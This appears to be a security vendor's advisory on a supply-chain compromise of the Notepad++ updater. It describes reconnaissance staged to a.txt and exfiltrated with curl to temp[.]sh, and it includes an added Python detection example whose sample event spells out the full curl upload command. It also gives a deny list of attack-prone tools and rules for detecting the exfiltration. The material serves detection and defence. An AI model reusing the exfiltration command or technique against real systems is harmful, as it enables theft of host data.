What happened in the Notepad++ compromise
On February 2nd, 2026, the free source-code editor Notepad++ was compromised.
Developer Don Ho published a security disclosure stating the compromise affected the update infrastructure behind Notepad++.
The disclosure states that multiple research groups likely implicate a Chinese state-sponsored group. The Advanced Persistent Threat (APT) groups involved maintained access from June 2025 until December 2nd, 2025.
Ho’s disclosure goes on to detail the sophistication of the supply chain attack targeting their update mechanisms. In this campaign, state-sponsored attackers successfully hijacked part of the legitimate distribution process.
Rather than exploiting end users directly, the adversary abused the trusted relationship between Notepad++ and its update infrastructure, enabling the delivery of trojanized installers to selectively targeted users.
The impact of this compromise is significant due to the widespread adoption of Notepad++ among developers, system administrators, and security professionals.
By weaponizing a trusted software update path, the attackers gained initial access, performed reconnaissance, and established persistence within victim environments, remaining undetected for months. This compromise illustrates once again how software supply chains remain a high-value target for nation-state actors.
Notepad++ has a history of maintaining a political stance as geopolitical events unfold across the globe. Prior releases have been published with clear political messages including standing with Hong Kong as early as v7.8.9, supporting Taiwan's independence in v8.6.9, and more recently standing with Ukraine in v8.8.1.
A special note can be placed on the irony surrounding the alleged Chinese APTs compromising Notepad++'s supply chain after multiple political messages supporting Taiwan, Hong Kong, and Ukraine.
Technical analysis of the compromised update mechanism
The attack specifically utilizes the WinGUP (GUP.exe) updater component of the Notepad++ update mechanism. Attackers distributed trojanized Notepad++ installers to targeted users, ensuring that the initial execution appeared legitimate and aligned with normal user behavior.
During the compromised update flow, the GUP.exe process was observed spawning an executable named AutoUpdater.exe. That behavior is anomalous under normal conditions.
Ordinarily, WinGUP performs update checks and downloads using the libcurl library internally and does not launch external binaries or invoke curl.exe directly.
Once executed, AutoUpdater.exe conducted a series of host-based reconnaissance actions. These included enumerating active network connections, collecting endpoint and operating system details, listing running processes, and identifying any actively logged-in user(s). The information was aggregated and written to a local file named "a.txt".
Following data collection, the malware leveraged curl.exe to exfiltrate the contents of "a.txt" to a remote endpoint hosted on file-sharing service temp[.]sh. The presence of a rogue curl.exe binary is a particularly strong indicator of malicious activity in this context, as it deviates from the expected behavior of the WinGUP updater and introduces a living-off-the-land style exfiltration technique.
Public reporting indicates that this campaign persisted for approximately six months, with attackers maintaining control over the compromised update channel and selectively targeting victims. The long dwell time suggests careful operational security and a high degree of confidence in the stealth of the attack.
Detection opportunities for malicious update activity
- WinGUP invoking external curl binaries
- Curl commands reaching out to temp[.]sh
- Creation of an a.txt file, or of other single-letter .txt files, since this is how the collected data was staged for exfiltration
- Instances of AutoUpdater.exe spawning from temporary directories
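To make the four detection opportunities above concrete, here is an added example (not from the original post or from ThreatLocker's products) that applies them to constructed Sysmon-style process-creation records; the field names, paths, user names and sample events are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed, Sysmon-style process-creation records modelled on the chain the
# post describes (GUP.exe -> AutoUpdater.exe -> curl.exe). Paths and user names
# are made up; field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\AutoUpdater.exe",
     "CommandLine": "AutoUpdater.exe"},
    {"ParentImage": r"C:\Users\bob\AppData\Local\Temp\AutoUpdater.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Users\bob\AppData\Local\Temp\a.txt" https://temp.sh/upload'},
    {"ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://example.invalid/"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": r'"notepad++.exe" notes.txt'},
]

TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)     # ...\Temp\... or ...\tmp\...
STAGING_FILE_RE = re.compile(r"(^|[\\\s\"'=@])[a-z]\.txt\b")   # a.txt, b.txt, ... as a token
TEMP_SH_RE = re.compile(r"\btemp\.sh\b")                       # the exfiltration host

def classify(event):
    """Return the names of the detection opportunities (from the list above) that one event matches."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if parent == "gup.exe" and image == "curl.exe":      # WinGUP should never launch curl
        hits.append("wingup_invokes_curl")
    if image == "curl.exe" and TEMP_SH_RE.search(cmd):   # curl reaching temp[.]sh
        hits.append("curl_to_temp_sh")
    if STAGING_FILE_RE.search(cmd):                      # a.txt / single-letter .txt staging file
        hits.append("single_letter_txt_staging")
    if image == "autoupdater.exe" and TEMP_DIR_RE.search(event.get("Image", "")):
        hits.append("autoupdater_from_temp")             # AutoUpdater.exe running out of a temp dir
    return hits

def scan(events):
    """Map event index -> matched rules, keeping only events with at least one hit."""
    return {i: h for i, h in ((i, classify(e)) for i, e in enumerate(events)) if h}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], "->", ", ".join(rules))
```

The last sample event (Explorer launching notepad++.exe with a normal document) produces no hit, which is the baseline a real deployment should be tuned against.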
Mitigation strategies for supply chain attacks
- Implement a robust allowlisting solution
- Analyze unusual network activity from applications in temporary directories
- Update trojanized versions of Notepad++ (versions 8.8.2 - 8.8.9) to 8.9.1
- Download updates manually from official sources as opposed to using built-in updaters
How organizations can defend against supply chain attacks
Supply chain compromises are especially dangerous because they abuse trusted software and legitimate update mechanisms. To defend against these attacks, security teams need visibility into application behavior, strict execution controls, and continuous monitoring for deviations from normal update workflows.
In this instance, a custom binary (AutoUpdater.exe) spawned from a trusted updater. Implement application control strategies that prevent unauthorized binaries from executing, even when launched by a trusted parent process.
Update mechanisms should also not be permitted to invoke extra tools, spawn additional executables, or communicate with unapproved domains without explicit approval. Limiting these interactions reduces the blast radius of a compromised updater.
Lastly, supply chain attacks often maintain long dwell times and operate quietly to avoid detection. Monitor for unusual process execution chains, unexpected outbound connections, and suspicious file creation patterns to identify compromised update paths before the impact spreads.
How ThreatLocker can help
Application Allowlisting and Ringfencing™
Although this attack does not require user interaction, allowlisting solutions can still stop unapproved tools and applications from running. In this instance, the custom binary "AutoUpdater.exe" would be automatically blocked as it is not native to the Notepad++ application definition.
ThreatLocker Application Allowlisting blocks applications that are not explicitly permitted, which could include unauthorized updaters and malicious binaries. Additional explicit deny policies can be created to prevent the usage of high-risk applications, such as Curl, WinGUP, Python, MSBuild, vssadmin, mshta, wscript, and PsExec.
Ringfencing™, the proprietary solution from ThreatLocker, prevents known and approved applications from interacting with each other in malicious ways (WinGUP invoking curl.exe) and from reaching out to malicious domains (temp[.]sh).
For applications that are high-risk but required for business processes, Ringfencing policies can be implemented to restrict what resources applications can interact with, such as specific files, internet access, the registry, or executing other applications.
ThreatLocker Detect & Cyber Hero® MDR
ThreatLocker Detect identifies behavior such as ransomware deployment, security service tampering, backup deletion, or data exfiltration and alerts your organization's internal security team or the Cyber Hero® Managed Detection and Response team to verify the actions and mitigate the incident.
ThreatLocker Detect includes detection rules to identify and prevent these attacks, which are globally available:
- TL.NC.1561 - Notepad++ Updater Contacting Foreign Domains
- TL.AAL.1562 - Notepad++ Updater Executing Foreign File
FAQs
What happened in the Notepad++ supply chain compromise?
Notepad++’s update infrastructure was compromised, allowing attackers to distribute trojanized installers to a subset of targeted users. Rather than exploiting a vulnerability on end-user systems, the attackers abused the trusted software update mechanism to gain initial access, perform reconnaissance, and maintain persistence.
Which versions of Notepad++ were affected?
Trojanized updates were observed in Notepad++ versions 8.8.2 through 8.8.9. Users should update to Notepad++ 8.9.1 or later using official download sources.
How did the attackers abuse the Notepad++ update process?
The attackers targeted the WinGUP (GUP.exe) updater component. During the compromised update flow, WinGUP spawned a malicious executable named AutoUpdater.exe. This executable performed host reconnaissance and exfiltrated collected data to a remote endpoint.
Did this attack require user interaction?
No. Once a trojanized update was delivered, the malicious activity occurred automatically as part of the update process.
Who is most at risk from this compromise?
Organizations and individuals who rely heavily on Notepad++, including developers, system administrators, and security professionals, are at higher risk due to the tool’s widespread use and elevated trust within technical environments.
How can organizations reduce the risk of similar attacks?
Organizations should implement strict application execution controls, monitor for abnormal application behavior, restrict how applications interact with external tools and services, and maintain visibility into update mechanisms.